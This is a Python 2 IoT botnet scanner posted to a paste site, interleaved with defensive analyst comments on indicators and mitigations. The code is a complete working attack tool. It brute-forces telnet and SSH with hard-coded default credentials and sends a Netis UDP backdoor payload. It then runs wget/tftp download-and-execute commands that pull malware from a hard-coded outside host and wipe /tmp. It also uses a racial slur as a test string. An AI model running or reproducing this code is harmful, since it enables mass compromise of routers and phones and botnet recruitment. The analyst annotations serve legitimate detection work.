mysql_Anarchy

[ PYTHON ] God Bot Scanner (SSH, TELNET, NETIS, PHONES)

Jun 4th, 2018
  1. import threading, sys, time, random, socket, re, os, paramiko
  2. from Queue import *
  3. from sys import stdout
  4.  
  5. if len(sys.argv) < 3:
             # Analyst note: the script (Python 2 syntax) expects two positional
             # arguments, a thread count and the path of a file with one target
             # address per line. With fewer, it prints the usage line and exits.
  6.         print "Usage: python "+sys.argv[0]+" <threads> <list>"
  7.         sys.exit()
  8.  
  9. # USER AND PASS LISTS #
      # Analyst note: these are hard-coded factory/default credentials. The telnet
      # thread below pairs usernames[i] with passwords[i]; the SSH thread splits
      # each ssh_passwords entry on ":" into user and password.
      # Defensive takeaway: any device still accepting one of these pairs on a
      # reachable telnet or SSH service should have the credential changed and
      # the service restricted or disabled.
  10. usernames = ["root", "admin", "root", "root"] #DONT CHANGE
  11. passwords = ["oelinux123", "admin", "Zte521", "vizxv"] #DONT CHANGE
  12. ssh_passwords = ["admin:1234", "root:1234"] #CAN CHANGE
      # First of two UDP datagrams the nnetis thread sends to port 53413. The
      # literal prefix on the wire is a usable network-detection signature.
  13. loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
  14.  
  15.  
  16. # START CONFIGURATION #
      # Analyst note: 103.194.169.245 is the payload-hosting address hard-coded in
      # this sample. It appears in three places: the binary URL, the shell-script
      # URL, and the wget/tftp fallback embedded in commandpayload. Treat it, and
      # the /tftp, /bins.sh and /sshd paths, as indicators when reviewing proxy,
      # DNS-less HTTP, or TFTP logs.
  17. url = "http://103.194.169.245/tftp" # ARM4 Binary
  18. sh_file = "http://103.194.169.245/bins.sh" # SH File
      # Second UDP datagram sent to port 53413 by the nnetis thread. It carries a
      # shell one-liner that works in /var/, downloads a file named sshd (wget,
      # falling back to tftp), marks it executable, runs it and deletes it.
  19. commandpayload = "AA\x00\x00AAAA cd /var/; rm -rf sshd; wget http://103.194.169.245/sshd || tftp -r sshd -g 103.194.169.245; chmod 777 sshd; ./sshd; rm -rf sshd\x00" # MIPSEL Binary
  20.  
  21. # DONT TOUCH
      # Analyst note: module-level state shared by every thread in the script.
      # spawn_shell is sent by the telnet thread on the "BCM" banner branch
      # before its download command.
  22. spawn_shell = "cat | sh"
      # Sends paramiko's log output to /dev/null, so the operator's host keeps no
      # paramiko log of the SSH attempts.
  23. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
      # Worker-thread count (argv[1]) and the raw target lines (argv[2]); the
      # lines keep their trailing newline until each thread class strips it.
  24. threads = int(sys.argv[1])
  25. ips = open(sys.argv[2], "r").readlines()
      # The three services this tool touches: telnet (23), SSH (22) and UDP 53413.
      # The list itself is not referenced again in this listing; each thread
      # class hard-codes its own port.
  26. ports = ["23", "22", "53413"]
  27. queue = Queue()
  28. qcount = 0
      # Splits url on "/" and keeps element 3, the last path component ("tftp"),
      # which the "vizxv" telnet branch uses as the file name in its tftp command.
  29. binary = url.split("/")
  30. binary = binary[3]
  31. ip = binary[2]
      # Counters declared at module level.
  32. found = 0
  33. count = 0
  34.  
  35. for ip in ips:
          # Analyst note: every line of the target file is queued as-is (newline
          # included) while a running count is redrawn on a single console line.
  36.     qcount += 1
  37.     stdout.write("\r[%d] Added to queue" % qcount)
  38.     stdout.flush()
  39.     queue.put(ip)
  40. print "\n"
  41.  
  42. def readUntil(tn, string, timeout=10):
          # Reads from the socket `tn` in chunks of up to 1024 bytes, appending to
          # a buffer, until `string` appears in the buffer; returns the whole
          # buffer. Raises a generic Exception('TIMEOUT!') once `timeout` seconds
          # have elapsed without a match.
          # The elapsed-time check only runs between recv() calls, so a blocking
          # recv() is bounded by whatever timeout the caller set on the socket,
          # and a socket-level timeout error propagates to the caller.
  43.     buf = ''
  44.     start_time = time.time()
  45.     while time.time() - start_time < timeout:
  46.         buf += tn.recv(1024)
  47.         time.sleep(0.01)
  48.         if string in buf: return buf
  49.     raise Exception('TIMEOUT!')
  50.  
  51. def worker():
          # Worker loop run by each pool thread. For every address taken from the
          # shared queue it starts three further threads, one per protocol handler
          # (sssh, ttelnet, nnetis), then marks the queue item done without
          # waiting for those threads to finish.
          # Analyst note: each target therefore sees near-simultaneous contact on
          # TCP/22, TCP/23 and UDP/53413 from the same source, which is a useful
          # correlation rule for network detection.
  52.     try:
  53.         while True:
  54.             try:
  55.                 if queue.empty() == True:
  56.                     sys.exit(1)
  57.                 ip = queue.get()
  58.                 ss = sssh(ip)
  59.                 ss.start()
  60.                 tt = ttelnet(ip)
  61.                 tt.start()
  62.                 nn = nnetis(ip)
  63.                 nn.start()
  64.                 queue.task_done()
                  # Bare except: every exception raised in the loop body is
                  # discarded silently.
  65.             except:
  66.                 pass
  67.     except:
  68.         pass
  69.  
  70. class ttelnet(threading.Thread):
              # Telnet handler thread: one instance per target address.
              # Analyst summary of run(): (1) connect to TCP/23 and read the
              # banner, (2) choose a default credential pair from substrings in
              # that banner and log in, (3) if the reply looks like a shell
              # prompt, send a one-line download-and-execute command.
              # Defensive takeaways: keep telnet off untrusted interfaces, replace
              # factory credentials, and alert on wget/tftp/chmod being run from
              # an interactive telnet session in /tmp or /var.
  71.         def __init__ (self, ip):
  72.             threading.Thread.__init__(self)
                  # Strip the newline left over from readlines().
  73.             self.ip = str(ip).rstrip('\n')
  74.         def run(self):
                  # Stage 1: connect (5 s socket timeout) and read up to the first
                  # ":" of the login banner. The banner is matched against device
                  # strings ("mdm9625", "9615-cdp", a generic "ogin" prompt,
                  # "(none)", "BCM") to pick which usernames/passwords index to
                  # use; the chosen username is sent immediately.
  75.             try:
  76.                 tn = socket.socket()
  77.                 tn.settimeout(5)
  78.                 tn.connect((self.ip,23))
  79.                 time.sleep(0.2)
  80.                 hoho = ''
  81.                 hoho += readUntil(tn, ":")
  82.                 if "mdm9625" in hoho:
  83.                     r00t = 0
  84.                     username = usernames[1]
  85.                     password = passwords[1]
  86.                     tn.send(username + "\n")
  87.                 elif "9615-cdp" in hoho:
  88.                     r00t = 1
  89.                     username = usernames[0]
  90.                     password = passwords[0]
  91.                     tn.send(username + "\n")
  92.                 elif "ogin" in hoho and "9615-cdp" not in hoho:
  93.                     zte = 1
  94.                     username = usernames[2]
  95.                     password = passwords[2]
  96.                     tn.send(username + "\n")
  97.                 elif "ogin" in hoho and "mdm9625" not in hoho:
  98.                     zte = 1
  99.                     username = usernames[2]
  100.                     password = passwords[2]
  101.                     tn.send(username + "\n")
  102.                 if "(none)" in hoho:
  103.                     zte = 0
  104.                     vizxv = 1
  105.                     username = usernames[3]
  106.                     password = passwords[3]
  107.                     tn.send(username + "\n")
  108.                 if "BCM" in hoho:
  109.                     zte = 0
  110.                     vizxv = 0
  111.                     BCM = 1
  112.                     username = usernames[1]
  113.                     password = passwords[1]
  114.                     tn.send(username + "\n")
  115.             except Exception:
  116.                 tn.close()
                   # Stage 2: wait for the next ":"-terminated prompt and, if it
                   # contains "assword", send the selected password and pause 3 s.
  117.             try:
  118.                 hoho = ''
  119.                 hoho += readUntil(tn, ":")
  120.                 if "assword" in hoho:
  121.                     tn.send(password + "\n")
  122.                     time.sleep(3)
  123.             except Exception:
  124.                 tn.close()
                   # Stage 3: read one chunk and treat any of "#", "$", "~", ">" or
                   # "root@" as evidence of a shell prompt. Each branch below sends
                   # a single command line that fetches a file from the hard-coded
                   # host (url or sh_file), makes it executable, runs it and
                   # removes it, then prints a status line and closes the socket.
                   # Host-side indicators: short-lived files named phone, filename,
                   # busybox or l.sh in /tmp or /var, and "rm -rf /tmp/*" (BCM
                   # branch), which also destroys the device's own temp data.
  125.             try:
  126.                 mp = ''
  127.                 mp += tn.recv(1024)
  128.                 if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
  129.                     if r00t: tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  130.                     if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  131.                     if zte: tn.send("cd /var/; rm -rf busybox filename; wget "+url+" -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename" + "\n"); print "\033[32m[ZTE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  132.                     if vizxv: tn.send("cd /var/ || cd /tmp/ || cd /; tftp -r "+binary+" -g "+ip+"; chmod 777 "+binary+"; ./"+binary+"; rm -rf "+binary+""); print "\033[32m[VIZXV] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  133.                     if BCM: tn.send(spawn_shell + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*" + "\n"); print "\033[32m[BCM] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  134.                     found += 1
                   # Any exception in this stage just closes the socket; nothing
                   # is logged.
  135.             except Exception:
  136.                 tn.close()
  137.                 pass
  138.  
  139. class nnetis(threading.Thread):
               # UDP handler thread for port 53413, labelled "netis" by the author.
               # run() sends loginpayload, waits 1 s, then sends commandpayload to
               # the target. It never reads a reply, so both datagrams go out
               # whether or not the host is a matching device.
               # Defensive takeaways: drop inbound UDP/53413 at the WAN edge, apply
               # vendor firmware updates for affected routers, and alert on
               # datagrams to that port that begin with "AAAAAAAAnetcore\x00".
  140.         def __init__ (self, ip):
  141.                 threading.Thread.__init__(self)
                       # Strip the newline left over from readlines().
  142.                 self.ip = str(ip).rstrip('\n')
  143.         def run(self):
  144.                 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  145.                 try:
  146.                         # sends netis payload to almost everything lmao
  147.                         s.sendto(loginpayload, (self.ip, 53413))
  148.                         time.sleep(1)
  149.                         s.sendto(commandpayload, (self.ip, 53413))
  150.                         time.sleep(2)
                       # Send errors are discarded; the socket is never closed
                       # explicitly.
  151.                 except Exception:
  152.                         pass
  153.  
  154. class sssh(threading.Thread):
           # SSH handler thread: one instance per target address.
           # Analyst summary of run(): try each "user:password" entry of
           # ssh_passwords against TCP/22, run a marker echo to confirm the
           # session returns command output, then run a download-and-execute
           # one-liner that pulls sh_file.
           # Defensive takeaways: disable password login for root/admin or the
           # SSH service itself on exposed devices, rate-limit failed logins, and
           # alert on an SSH exec request that chains wget, sh and "rm -rf /tmp/*".
  155.     def __init__ (self, ip):
  156.         threading.Thread.__init__(self)
               # Strip the newline left over from readlines().
  157.         self.ip = str(ip).rstrip('\n')
  158.     def run(self):
               # x is a one-shot flag: it is set to 0 at the end of the first pass,
               # so the while body runs exactly once.
  159.         x = 1
  160.         while x != 0:
  161.             try:
  162.                 username='root'
  163.                 password="0"
  164.                 port = 22
  165.                 ssh = paramiko.SSHClient()
                       # AutoAddPolicy accepts any host key without verification.
  166.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  167.                 dobreak=False
                       # Credential loop: "n/a" on either side of the colon means an
                       # empty user name or empty password. The first successful
                       # connect ends the loop; failures are swallowed.
  168.                 for passwd in ssh_passwords:
  169.                     if ":n/a" in passwd:
  170.                         password=""
  171.                     else:
  172.                         password=passwd.split(":")[1]
  173.                     if "n/a:" in passwd:
  174.                         username=""
  175.                     else:
  176.                         username=passwd.split(":")[0]
  177.                     try:
  178.                         ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  179.                         dobreak=True
  180.                         break
  181.                     except:
  182.                         pass
  183.                     if True == dobreak:
  184.                         break
                       # Marker check: run an echo and look for the echoed word in
                       # stdout. The session is only used further if the word comes
                       # back; presumably this filters out services that accept the
                       # login but do not execute commands (confirm against sample
                       # behaviour before relying on it).
  185.                 badserver=True
  186.                 stdin, stdout, stderr = ssh.exec_command("echo nigger")
  187.                 output = stdout.read()
  188.                 if "nigger" in output:
  189.                     badserver=False
                       # On success: print a status line, then fetch sh_file to
                       # /tmp/l.sh, run it with sh and wipe /tmp on the target.
  190.                 if badserver == False:
  191.                     print "\033[36m[SSH] command sent %s!\033[37m"%(self.ip)
  192.                     ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
  193.                     time.sleep(3)
  194.                     ssh.close()
  195.                 if badserver == True:
  196.                     ssh.close()
                   # Bare except: any failure in the pass above is discarded.
  197.             except:
  198.                 pass
  199.             x = 0
  200.  
  201. for g in xrange(threads):
           # Analyst note: starts `threads` daemon threads running worker(). Being
           # daemon threads, they do not keep the process alive on their own.
  202.     t = threading.Thread(target=worker)
  203.     t.setDaemon(True)
  204.     t.start()
  205.    
       # Analyst note: blocks until task_done() has been called for every queued
       # address, then prints the completion line. task_done() is called right
       # after the per-protocol threads are started, not when they finish.
  206. queue.join()
  207. print "Finished!"